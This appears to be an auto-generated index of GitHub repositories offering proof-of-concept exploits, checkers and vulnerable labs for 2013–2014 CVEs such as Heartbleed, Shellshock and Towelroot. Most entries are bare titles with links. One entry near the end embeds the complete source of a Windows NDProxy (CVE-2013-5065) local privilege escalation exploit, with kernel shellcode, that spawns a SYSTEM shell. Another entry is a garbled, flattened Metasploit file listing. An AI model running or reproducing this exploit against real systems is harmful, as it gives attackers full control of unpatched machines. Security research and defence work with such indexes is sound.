**vulnerabilities‘ Poc and Exploit** : [koozxcv/CVE-2014-7911](https://api.github.com/repos/koozxcv/CVE-2014-7911) create time: 2016-03-22T02:02:11Z

**must run this native binary with system privilege** : [koozxcv/CVE-2014-4322](https://api.github.com/repos/koozxcv/CVE-2014-4322) create time: 2016-03-23T03:29:27Z

**CVE-2014-7911 vulnerability and CVE-2014-4322 vulnerability to get root privilege!** : [koozxcv/CVE-2014-7911-CVE-2014-4322_get_root_privilege](https://api.github.com/repos/koozxcv/CVE-2014-7911-CVE-2014-4322_get_root_privilege) create time: 2016-03-23T03:21:11Z

**POC for CVE-2014-0160 (Heartbleed) for DTLS** : [hreese/heartbleed-dtls](https://api.github.com/repos/hreese/heartbleed-dtls) create time: 2014-04-12T14:13:36Z

**None** : [sin4ts/CVE2014-3153](https://api.github.com/repos/sin4ts/CVE2014-3153) create time: 2016-05-01T20:13:04Z

**None** : [irain1987/cve-2014-9707](https://api.github.com/repos/irain1987/cve-2014-9707) create time: 2016-07-07T12:27:56Z

**CVE-2014-6332 ZeroDay POC - Starts PowerShell** : [mourr/CVE-2014-6332](https://api.github.com/repos/mourr/CVE-2014-6332) create time: 2016-08-29T17:13:07Z

**None** : [ele7enxxh/CVE-2014-7911](https://api.github.com/repos/ele7enxxh/CVE-2014-7911) create time: 2015-07-03T04:43:07Z

**exp for cve-2014-7911 which can get system privillage** : [mabin004/cve-2014-7911](https://api.github.com/repos/mabin004/cve-2014-7911) create time: 2016-09-28T07:56:07Z

**CVE-2014-0816** : [tandasat/CVE-2014-0816](https://api.github.com/repos/tandasat/CVE-2014-0816) create time: 2014-02-27T03:07:52Z

**String MVC Framework Path-Traversal proof of concept. CVE-2014-3625 ** : [gforresu/SpringPathTraversal](https://api.github.com/repos/gforresu/SpringPathTraversal) create time: 2016-10-26T16:51:00Z

**Reproducible exploits for: CVE-2016-1240 CVE-2008-2938 CVE-2014-2064 CVE-2014-1904** : [Naramsim/Offensive](https://api.github.com/repos/Naramsim/Offensive) create time: 2016-10-13T13:46:46Z

**A request parameter filter solution for Struts 1 CVE-2014-0114 based on the work of Alvaro Munoz and the HP Fortify team** : [rgielen/struts1filter](https://api.github.com/repos/rgielen/struts1filter) create time: 2014-05-22T19:14:54Z

**None** : [Pilou-Pilou/docker_CVE-2014-6271.](https://api.github.com/repos/Pilou-Pilou/docker_CVE-2014-6271.) create time: 2017-01-25T21:51:52Z

**:scream: Python library and utility for CVE-2014-6271 (aka. "shellshock")** : [ramnes/pyshellshock](https://api.github.com/repos/ramnes/pyshellshock) create time: 2014-11-06T19:45:54Z

**CVE-2014-4210+Redis未授权访问** : [NoneNotNull/SSRFX](https://api.github.com/repos/NoneNotNull/SSRFX) create time: 2017-03-10T02:09:48Z

**None** : [ottimo/burp-alfresco-referer-proxy-cve-2014-9301](https://api.github.com/repos/ottimo/burp-alfresco-referer-proxy-cve-2014-9301) create time: 2017-03-21T14:05:12Z

**rabl 0.8.6 + fix for CVE-2014-4671** : [cph/rabl-old](https://api.github.com/repos/cph/rabl-old) create time: 2017-03-21T19:43:46Z

**Quick and dirty nessus .audit file to check is bash is vulnerable to CVE-2014-6271** : [ilismal/Nessus_CVE-2014-6271_check](https://api.github.com/repos/ilismal/Nessus_CVE-2014-6271_check) create time: 2014-09-25T09:02:42Z

**CVE-2014-0050 Vulnerable site sample** : [jrrdev/cve-2014-0050](https://api.github.com/repos/jrrdev/cve-2014-0050) create time: 2017-03-15T04:59:23Z

**DEPRECATED: Chef cookbook to audit & remediate "Shellshock" (BASH-CVE-2014-7169)** : [chef-boneyard/bash-shellshock](https://api.github.com/repos/chef-boneyard/bash-shellshock) create time: 2014-10-31T21:12:24Z

**CVE-2014-3153 aka towelroot** : [timwr/CVE-2014-3153](https://api.github.com/repos/timwr/CVE-2014-3153) create time: 2014-07-24T13:28:00Z

**Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell** : [zalalov/CVE-2014-6271](https://api.github.com/repos/zalalov/CVE-2014-6271) create time: 2017-04-30T19:47:00Z

**cve-2014-0130 rails directory traversal vuln** : [omarkurt/cve-2014-0130](https://api.github.com/repos/omarkurt/cve-2014-0130) create time: 2014-05-08T14:40:36Z

**php_cve-2014-8142_cve-2015-0231的漏洞环境docker** : [3xp10it/php_cve-2014-8142_cve-2015-0231](https://api.github.com/repos/3xp10it/php_cve-2014-8142_cve-2015-0231) create time: 2017-07-09T06:06:28Z

**CVE-2014-9322 (a.k.a BadIRET) proof of concept for Linux** : [RKX1209/CVE-2014-9322](https://api.github.com/repos/RKX1209/CVE-2014-9322) create time: 2017-07-19T10:06:37Z

**CVE-2014-1303 (WebKit Heap based BOF) proof of concept for Linux** : [RKX1209/CVE-2014-1303](https://api.github.com/repos/RKX1209/CVE-2014-1303) create time: 2017-07-07T06:15:56Z

**Shellshock exploit + vulnerable environment** : [opsxcq/exploit-CVE-2014-6271](https://api.github.com/repos/opsxcq/exploit-CVE-2014-6271) create time: 2016-12-07T23:38:50Z

**Written fro CVE-2014-6271** : [Anklebiter87/Cgi-bin_bash_Reverse](https://api.github.com/repos/Anklebiter87/Cgi-bin_bash_Reverse) create time: 2014-09-25T02:47:25Z

**Shellshock exploitation script that is able to upload and RCE using any vector due to its versatility.** : [0x00-0x00/CVE-2014-6271](https://api.github.com/repos/0x00-0x00/CVE-2014-6271) create time: 2017-11-23T14:45:22Z

**CVE-2014-0094 test program for struts1** : [HasegawaTadamitsu/CVE-2014-0094-test-program-for-struts1](https://api.github.com/repos/HasegawaTadamitsu/CVE-2014-0094-test-program-for-struts1) create time: 2014-04-27T11:31:59Z

**Simple uc httpd exploit made with py3.. this exploit was written from CVE-2014-2324** : [sp4c30x1/uc_httpd_exploit](https://api.github.com/repos/sp4c30x1/uc_httpd_exploit) create time: 2017-12-30T17:46:39Z

**CVE-2014-10069** : [Manouchehri/hitron-cfg-decrypter](https://api.github.com/repos/Manouchehri/hitron-cfg-decrypter) create time: 2018-01-07T14:37:29Z

**CS4238 Computer Security Practices** : [kowshik-sundararajan/CVE-2014-6271](https://api.github.com/repos/kowshik-sundararajan/CVE-2014-6271) create time: 2018-05-05T05:50:50Z

**Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.** : [ThanHuuTuan/Heartexploit](https://api.github.com/repos/ThanHuuTuan/Heartexploit) create time: 2019-08-05T10:09:44Z

**Shellshock vulnerability attacker** : [w4fz5uck5/ShockZaum-CVE-2014-6271](https://api.github.com/repos/w4fz5uck5/ShockZaum-CVE-2014-6271) create time: 2018-06-18T16:09:15Z

** Automated Oracle CVE-2014-6577 exploitation via SQLi** : [SecurityArtWork/oracle-xxe-sqli](https://api.github.com/repos/SecurityArtWork/oracle-xxe-sqli) create time: 2018-07-13T12:25:33Z

**None** : [happynote3966/CVE-2014-3704](https://api.github.com/repos/happynote3966/CVE-2014-3704) create time: 2018-07-11T16:05:32Z

**None** : [Aruthw/CVE-2014-6271](https://api.github.com/repos/Aruthw/CVE-2014-6271) create time: 2018-06-30T13:26:20Z

**Gain root privilege by exploiting CVE-2014-3153 vulnerability** : [dangtunguyen/TowelRoot](https://api.github.com/repos/dangtunguyen/TowelRoot) create time: 2018-09-27T03:16:15Z

**None** : [CytQ/CVE-2014-7911_poc](https://api.github.com/repos/CytQ/CVE-2014-7911_poc) create time: 2018-09-28T07:45:19Z

**来自:https://www.freebuf.com/articles/web/31700.html** : [caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC](https://api.github.com/repos/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC) create time: 2018-11-08T02:50:28Z

**None** : [tafamace/CVE-2014-8110](https://api.github.com/repos/tafamace/CVE-2014-8110) create time: 2018-11-19T07:38:20Z

**CVE-2014-4511** : [michaelsss1/gitlist-RCE](https://api.github.com/repos/michaelsss1/gitlist-RCE) create time: 2018-12-03T02:21:29Z

**CVE-2014-8682** : [nihal1306/gogs](https://api.github.com/repos/nihal1306/gogs) create time: 2018-12-04T00:40:09Z

**cve-2014-0160** : [cved-sources/cve-2014-0160](https://api.github.com/repos/cved-sources/cve-2014-0160) create time: 2019-01-06T20:57:53Z

**Bash implementation of CVE-2014-5284** : [mbadanoiu/CVE-2014-5284](https://api.github.com/repos/mbadanoiu/CVE-2014-5284) create time: 2019-01-02T21:36:33Z

**cve-2014-6271** : [cved-sources/cve-2014-6271](https://api.github.com/repos/cved-sources/cve-2014-6271) create time: 2019-01-06T21:08:32Z

**A checker (site and tool) for CVE-2014-0160** : [mozilla-services/Heartbleed](https://api.github.com/repos/mozilla-services/Heartbleed) create time: 2014-04-15T22:22:18Z

**None** : [artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS](https://api.github.com/repos/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS) create time: 2019-04-02T17:08:01Z

**A multifunctional tool for checking and exploiting the Shellshock(a. k. a. Bashd00r) vulnerabilty. CVE 2014-6271. Created for Python 2.7.13.** : [r4z0r5/SwissArmyShellshocker](https://api.github.com/repos/r4z0r5/SwissArmyShellshocker) create time: 2017-08-11T11:34:13Z

**Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔** : [cldme/heartbleed-bug](https://api.github.com/repos/cldme/heartbleed-bug) create time: 2019-04-03T21:32:50Z

**None** : [shawntns/exploit-CVE-2014-6271](https://api.github.com/repos/shawntns/exploit-CVE-2014-6271) create time: 2019-04-27T18:55:39Z

**CVE-2014-0160** : [Saymeis/HeartBleed](https://api.github.com/repos/Saymeis/HeartBleed) create time: 2018-12-10T22:42:51Z

**Lets have fun by digging into a Zyxel router firmware and MIPS Arch** : [BenChaliah/MIPS-CVE-2014-9222](https://api.github.com/repos/BenChaliah/MIPS-CVE-2014-9222) create time: 2019-06-11T18:00:36Z

**None** : [aenlr/strutt-cve-2014-0114](https://api.github.com/repos/aenlr/strutt-cve-2014-0114) create time: 2019-05-27T07:04:54Z

**Demonstration of the Heartbleed Bug CVE-2014-0160** : [cheese-hub/heartbleed](https://api.github.com/repos/cheese-hub/heartbleed) create time: 2019-02-27T20:46:41Z

**cve-2014-4014** : [vnik5287/cve-2014-4014-privesc](https://api.github.com/repos/vnik5287/cve-2014-4014-privesc) create time: 2019-07-23T12:24:43Z

**My old sysret / ptrace PoC** : [vnik5287/cve-2014-4699-ptrace](https://api.github.com/repos/vnik5287/cve-2014-4699-ptrace) create time: 2019-07-23T12:39:21Z

** app turn nil publics and privates into blanks 3 months ago config Use bundler/setup for more graceful bundler related failures 11 days ago data Add token fiddling from nishang 12 hours ago db Revert "Diff triggering comment" 12 days ago documentation Switch to Msf::OperatingSystems::Match::WINDOWS 2 months ago external Use PDWORD_PTR and DWORD_PTR 29 days ago features Up aruba timeout for simplecov overhead 4 days ago lib Check for load errors in reload_all 4 days ago modules Land #4255 - CVE-2014-6332 Internet Explorer 19 hours ago plugins Land #3588, @tobd-r7's Fix SpaceBeforeModifierKeyword Rubocop warning 4 months ago script rails generate cucumber:install 3 months ago scripts delete the old script a month ago spec Remove debug file writes 2 days ago test Fix up comment splats with the correct URI a month ago tools Fix bugs 24 days ago .gitignore Add note about rbenv for rvm .versions.conf local override 24 days ago .gitmodules Add RDI submodule, port Kitrap0d a year ago .mailmap Add @trosen-r7's alias for commits 6 months ago .rspec Add modern --require to .rspec 2 months ago .rubocop.yml Reapply PR #4113 (removed via #4175) 18 days ago .ruby-gemset Restoring ruby and gemset files 6 months ago .ruby-version Oh good, another Ruby version bump 14 days ago .simplecov Remove fastlib 2 months ago .travis.yml Enable fast_finish on travis-ci 12 days ago .yardopts Various merge resolutions from master <- staging 4 months ago CONTRIBUTING.md Add a don't to CONTRIBUTING about merge messages 11 days ago COPYING With 66 days left in 2014, may as well update a month ago Gemfile metasploit-credential bump to 0.13.3 16 days ago Gemfile.local.example Various merge resolutions from master <- staging 4 months ago Gemfile.lock Bump mdm version number 12 days ago HACKING Update link for The Metasploit Development Environment 5 months ago LICENSE Remove fastlib 2 months ago README.md Encourage use of the installer for users. 8 months ago Rakefile Merge branch 'feature/MSP-11130/metasploit-framework-spec-constants' … 24 days ago metasploit-framework-db.gemspec metasploit-credential bump to 0.13.3 16 days ago metasploit-framework-full.gemspec Update metasploit-framework-full.gemspec 23 days ago metasploit-framework-pcap.gemspec Depend on metasloit-framework in optional gemspecs 24 days ago metasploit-framework.gemspec Update meterpreter_bins to 0.0.11 18 days ago msfbinscan Remove fastlib 2 months ago msfcli Fix thread-leaks in msfcli spec 17 days ago msfconsole @wvu-r7 is a skilled negotiator. s/stdout/stderr/ a month ago msfd Remove fastlib 2 months ago msfelfscan Remove fastlib 2 months ago msfencode Remove fastlib 2 months ago msfmachscan Remove fastlib 2 months ago msfpayload fixes merge conflicts msfpayload & exe a month ago msfpescan Remove fastlib 2 months ago msfrop Remove fastlib 2 months ago msfrpc Remove fastlib 2 months ago msfrpcd Remove call to legacy db.sink queue, closes #4244 7 days ago msfupdate Always use maybe_wait_and_exit in msfupdate a year ago msfvenom Fix #4047 - undefined method `rank' due to an invalid encoder name 19 days ago README.md ** : [MarkoArmitage/metasploit-framework](https://api.github.com/repos/MarkoArmitage/metasploit-framework) create time: 2014-11-29T11:01:01Z

**Vulnerability as a service: showcasing CVS-2014-6271, a.k.a. Shellshock** : [hmlio/vaas-cve-2014-6271](https://api.github.com/repos/hmlio/vaas-cve-2014-6271) create time: 2015-07-11T21:42:05Z

**Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed** : [hmlio/vaas-cve-2014-0160](https://api.github.com/repos/hmlio/vaas-cve-2014-0160) create time: 2015-07-12T22:40:54Z

**None** : [Sindadziy/cve-2014-6271](https://api.github.com/repos/Sindadziy/cve-2014-6271) create time: 2019-11-12T12:10:09Z

**cve-2014-6271** : [wenyu1999/bash-shellshock](https://api.github.com/repos/wenyu1999/bash-shellshock) create time: 2019-11-13T13:48:51Z

**CVE-2014-1322 - IPC Local Security Bypass | Mac OSX (Affected. >= 10.9.2)** : [raymondpittman/IPC-Memory-Mac-OSX-Exploit](https://api.github.com/repos/raymondpittman/IPC-Memory-Mac-OSX-Exploit) create time: 2019-12-10T09:41:55Z

**HttpFileServer httpd 2.3** : [roughiz/cve-2014-6287.py](https://api.github.com/repos/roughiz/cve-2014-6287.py) create time: 2019-12-27T13:01:10Z

**None** : [Any3ite/CVE-2014-6271](https://api.github.com/repos/Any3ite/CVE-2014-6271) create time: 2020-01-06T08:24:35Z

**None** : [Sindayifu/CVE-2019-14287-CVE-2014-6271](https://api.github.com/repos/Sindayifu/CVE-2019-14287-CVE-2014-6271) create time: 2019-11-13T14:17:19Z

**updating services to fix Heart-bleed bug (CVE-2014-0160)** : [hack3r-0m/heartbleed_fix_updated](https://api.github.com/repos/hack3r-0m/heartbleed_fix_updated) create time: 2020-01-15T07:31:04Z

**Python3 script to scan for Linksys smart wifi devices that are vulnerable to CVE-2014-8244** : [JollyJumbuckk/LinksysLeaks](https://api.github.com/repos/JollyJumbuckk/LinksysLeaks) create time: 2020-01-24T19:14:49Z

***CVE-2014-6271* Unix Arbitrary Code Execution Exploit commonly know as Shell Shock. Examples, Docs, Incident Response and Vulnerability/Risk Assessment, and Additional Resources may be dumped here. Enjoy :) --- somhmxxghoul ---** : [somhm-solutions/Shell-Shock](https://api.github.com/repos/somhm-solutions/Shell-Shock) create time: 2020-01-28T07:48:46Z

**Exhaust WordPress <V5.0.1 resources using long passwords (CVE-2014-9016)** : [Primus27/WordPress-Long-Password-Denial-of-Service](https://api.github.com/repos/Primus27/WordPress-Long-Password-Denial-of-Service) create time: 2020-02-08T15:19:42Z

**CVE-2014-2630 exploit for xglance-bin ** : [redtimmy/perf-exploiter](https://api.github.com/repos/redtimmy/perf-exploiter) create time: 2020-02-04T16:47:44Z

**SNP Assignment 1 Report - Linux box exploitation ( Vulnerability CVE-2014-0038)** : [kiruthikan99/IT19115276](https://api.github.com/repos/kiruthikan99/IT19115276) create time: 2020-05-12T12:35:12Z

**This is an individual assignment for secure network programming** : [rashmikadileeshara/CVE-2014-6271-Shellshock-](https://api.github.com/repos/rashmikadileeshara/CVE-2014-6271-Shellshock-) create time: 2020-05-12T17:51:06Z

**None** : [Dilith006/CVE-2014-6271](https://api.github.com/repos/Dilith006/CVE-2014-6271) create time: 2020-05-12T18:37:14Z

**Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL/TLS versions)** : [rouze-d/heartbleed](https://api.github.com/repos/rouze-d/heartbleed) create time: 2020-07-04T11:46:51Z

**CVE-2014-4210 SSRF PORTSCANNER PoC** : [unmanarc/CVE-2014-4210-SSRF-PORTSCANNER-POC](https://api.github.com/repos/unmanarc/CVE-2014-4210-SSRF-PORTSCANNER-POC) create time: 2020-07-21T03:45:30Z

**:poodle: Poodle (Padding Oracle On Downgraded Legacy Encryption) attack CVE-2014-3566 :poodle:** : [mpgn/poodle-PoC](https://api.github.com/repos/mpgn/poodle-PoC) create time: 2015-02-03T20:28:27Z

**None** : [cyberharsh/Shellbash-CVE-2014-6271](https://api.github.com/repos/cyberharsh/Shellbash-CVE-2014-6271) create time: 2020-06-26T11:08:22Z

**Weblogic SearchPublicRegistries SSRF(CVE-2014-4210) Exploit Script based on Python3** : [NHPT/WebLogic-SSRF_CVE-2014-4210](https://api.github.com/repos/NHPT/WebLogic-SSRF_CVE-2014-4210) create time: 2020-11-19T16:06:57Z

**None** : [MuirlandOracle/CVE-2014-6271-IPFire](https://api.github.com/repos/MuirlandOracle/CVE-2014-6271-IPFire) create time: 2020-11-12T04:12:55Z

**weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883** : [0xn0ne/weblogicScanner](https://api.github.com/repos/0xn0ne/weblogicScanner) create time: 2020-01-15T04:26:29Z

**None** : [wikiZ/cve-2014-4113](https://api.github.com/repos/wikiZ/cve-2014-4113) create time: 2020-11-30T14:50:43Z

**None** : [ossf-cve-benchmark/CVE-2019-20149](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-20149) create time: 2020-12-01T09:18:58Z

**None** : [WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed](https://api.github.com/repos/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed) create time: 2020-12-09T15:08:21Z

**CVE-2014-0160 OpenSSL Heartbleed Proof of Concept** : [GuillermoEscobero/heartbleed](https://api.github.com/repos/GuillermoEscobero/heartbleed) create time: 2020-12-13T19:53:50Z

**CVE-2014-0472 Django unexpected code execution using reverse()** : [christasa/CVE-2014-0472](https://api.github.com/repos/christasa/CVE-2014-0472) create time: 2020-09-23T16:21:57Z

**A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device** : [nyc-tophile/A2SV--SSL-VUL-Scan](https://api.github.com/repos/nyc-tophile/A2SV--SSL-VUL-Scan) create time: 2021-01-01T12:26:08Z

**None** : [AndyFeiLi/CVE-2014-4688](https://api.github.com/repos/AndyFeiLi/CVE-2014-4688) create time: 2021-01-05T10:02:37Z

**Exploiting CVE-2014-3153, AKA Towelroot.** : [elongl/CVE-2014-3153](https://api.github.com/repos/elongl/CVE-2014-3153) create time: 2020-10-31T11:39:11Z

**CVE-2014-3551** : [JavaGarcia/CVE-2014-3551](https://api.github.com/repos/JavaGarcia/CVE-2014-3551) create time: 2021-01-27T01:02:49Z

**OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo.** : [ingochris/heartpatch.us](https://api.github.com/repos/ingochris/heartpatch.us) create time: 2021-02-14T10:48:56Z

**None** : [Nicoslo/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287](https://api.github.com/repos/Nicoslo/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287) create time: 2021-02-20T18:28:16Z

**:broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:** : [mpgn/heartbleed-PoC](https://api.github.com/repos/mpgn/heartbleed-PoC) create time: 2015-03-08T19:54:33Z

**A checker (site and tool) for CVE-2014-0160** : [FiloSottile/Heartbleed](https://api.github.com/repos/FiloSottile/Heartbleed) create time: 2014-04-07T23:03:09Z

**None** : [shreesh1/CVE-2014-0226-poc](https://api.github.com/repos/shreesh1/CVE-2014-0226-poc) create time: 2021-04-02T04:53:26Z

**Exploiting CVE-2014-7205 by injecting arbitrary JavaScript resulting in Remote Code Execution.** : [maximilianmarx/bassmaster-rce](https://api.github.com/repos/maximilianmarx/bassmaster-rce) create time: 2021-04-05T17:02:36Z

**Demo app showing how the Rails CVE-2013-5664 vulnerability works.** : [phusion/rails-cve-2012-5664-test](https://api.github.com/repos/phusion/rails-cve-2012-5664-test) create time: 2013-01-03T10:07:27Z

**Silly Rails App to demonstrate vuln CVE-2013-0156** : [terracatta/name_reverser](https://api.github.com/repos/terracatta/name_reverser) create time: 2013-01-10T20:46:08Z

**crack repo from jnunemaker but with version 0.1.8 and rails CVE-2013-0156 vulnerability fixed** : [josal/crack-0.1.8-fixed](https://api.github.com/repos/josal/crack-0.1.8-fixed) create time: 2013-01-11T18:21:57Z

**Bootstrapped Rails 3.2.10 to test the remote code exploit CVE-2013-0156** : [bsodmike/rails-exploit-cve-2013-0156](https://api.github.com/repos/bsodmike/rails-exploit-cve-2013-0156) create time: 2013-01-12T13:37:05Z

**None** : [mitaku/rails_cve_2013_0156_patch](https://api.github.com/repos/mitaku/rails_cve_2013_0156_patch) create time: 2013-01-18T03:35:08Z

**Inspect all of your heroku apps to see if they are running a vulnerable version of Rails** : [heroku/heroku-CVE-2013-0156](https://api.github.com/repos/heroku/heroku-CVE-2013-0156) create time: 2013-01-11T02:13:48Z

**None** : [heroku/heroku-CVE-2013-0333](https://api.github.com/repos/heroku/heroku-CVE-2013-0333) create time: 2013-01-29T00:33:03Z

**Inspect all of your Heroku apps for vulnerable versions of the JSON gem** : [heroku/heroku-CVE-2013-0269](https://api.github.com/repos/heroku/heroku-CVE-2013-0269) create time: 2013-02-11T18:02:20Z

**Discover uPNP devices vulnerable to CVE-2013-0229 / CVE-2013-0230 / CVE-2012-5958 / CVE-2012-5959** : [lochiiconnectivity/vulnupnp](https://api.github.com/repos/lochiiconnectivity/vulnupnp) create time: 2013-04-14T23:34:56Z

**None** : [feliam/CVE-2013-2730](https://api.github.com/repos/feliam/CVE-2013-2730) create time: 2013-05-15T21:15:12Z

**None** : [tarunyadav/fix-cve-2013-2094](https://api.github.com/repos/tarunyadav/fix-cve-2013-2094) create time: 2013-06-18T04:43:07Z

**original cve-2013-2094 exploit and a rewritten version for educational purposes** : [realtalk/cve-2013-2094](https://api.github.com/repos/realtalk/cve-2013-2094) create time: 2013-05-20T04:23:13Z

**Novell ZENworks Mobile Management - LFI RCE** : [steponequit/CVE-2013-1081](https://api.github.com/repos/steponequit/CVE-2013-1081) create time: 2013-05-31T08:53:13Z

**CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86/x86_64** : [Pashkela/CVE-2013-2094](https://api.github.com/repos/Pashkela/CVE-2013-2094) create time: 2013-06-16T11:53:36Z

**CVE-2013-2094 exploit for android** : [hiikezoe/libperf_event_exploit](https://api.github.com/repos/hiikezoe/libperf_event_exploit) create time: 2013-06-05T10:59:16Z

**CVE-2013-2596 exploit for android** : [hiikezoe/libfb_mem_exploit](https://api.github.com/repos/hiikezoe/libfb_mem_exploit) create time: 2013-07-16T11:24:09Z

** :unlock: CVE-2013-4175 -- Local denial of service demo (C)** : [hartwork/mysecureshell-issues](https://api.github.com/repos/hartwork/mysecureshell-issues) create time: 2013-07-20T21:59:32Z

**CVE-2013-2595 exploit** : [fi01/libmsm_cameraconfig_exploit](https://api.github.com/repos/fi01/libmsm_cameraconfig_exploit) create time: 2013-10-03T04:38:27Z

**metasploit module for CVE-2013-3319 / SAP Security Note 1816536** : [integrity-sa/cve-2013-3319](https://api.github.com/repos/integrity-sa/cve-2013-3319) create time: 2013-07-10T13:47:26Z

**None** : [travelworld/cve_2013_3893_trigger.html](https://api.github.com/repos/travelworld/cve_2013_3893_trigger.html) create time: 2013-10-15T14:56:21Z

** Grails sample application using the Javamelody 1.44 plugin to illustrate the CVE-2013-4378 vulnerability.** : [theratpack/grails-javamelody-sample-app](https://api.github.com/repos/theratpack/grails-javamelody-sample-app) create time: 2013-10-16T06:48:28Z

**None** : [guhe120/CVE-2013-5842](https://api.github.com/repos/guhe120/CVE-2013-5842) create time: 2013-11-12T08:23:44Z

**CVE-2013-6282 exploit** : [fi01/libput_user_exploit](https://api.github.com/repos/fi01/libput_user_exploit) create time: 2013-11-18T03:08:41Z

**JIT spray version of cve-2013-1491** : [guhe120/CVE20131491-JIT](https://api.github.com/repos/guhe120/CVE20131491-JIT) create time: 2013-10-03T07:10:37Z

**CVE-2013-6282 exploit** : [fi01/libget_user_exploit](https://api.github.com/repos/fi01/libget_user_exploit) create time: 2013-11-28T08:34:35Z

**# NDPROXY Local SYSTEM privilege escalation # http://www.offensive-security.com # Tested on Windows XP SP3 # http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/     # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ??              ???   from ctypes import * from ctypes.wintypes import * import os, sys   kernel32 = windll.kernel32 ntdll = windll.ntdll   GENERIC_READ     = 0x80000000 GENERIC_WRITE    = 0x40000000 FILE_SHARE_READ  = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE            = 0x0020 PROCESS_VM_READ             = 0x0010 MEM_COMMIT                  = 0x00001000 MEM_RESERVE                 = 0x00002000 MEM_FREE                    = 0x00010000 PAGE_EXECUTE_READWRITE      = 0x00000040 PROCESS_ALL_ACCESS          = 2097151 FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0   def log(msg):     print msg   def getLastError():     """[-] Format GetLastError"""     buf = create_string_buffer(2048)     if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,             kernel32.GetLastError(), 0,             buf, sizeof(buf), NULL):         log(buf.value)     else:         log("[-] Unknown Error")   print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" print "[*] Vulnerability found in the wild" print "[*] Coded by Offensive Security"                 tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) InBuf = c_char_p(tmp)   dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS:     print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus     getLastError() written = c_ulong() sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0:     print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc     getLastError()   dwRetBytes = DWORD(0) DEVICE_NAME   = "\\\\.\\NDProxy" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1:     print "[-] Couldn't open the device... :("     sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print "[+] Spawning SYSTEM Shell..." os.system("start /d \"C:\\windows\\system32\" cmd.exe")** : [Friarfukd/RobbinHood](https://api.github.com/repos/Friarfukd/RobbinHood) create time: 2013-12-07T05:37:28Z

**Using CVE-2013-6282 to bypass Samsung kernel module authentication** : [jeboo/bypasslkm](https://api.github.com/repos/jeboo/bypasslkm) create time: 2013-12-21T01:51:42Z

**None** : [Meatballs1/cve-2013-1300](https://api.github.com/repos/Meatballs1/cve-2013-1300) create time: 2013-09-09T14:20:57Z

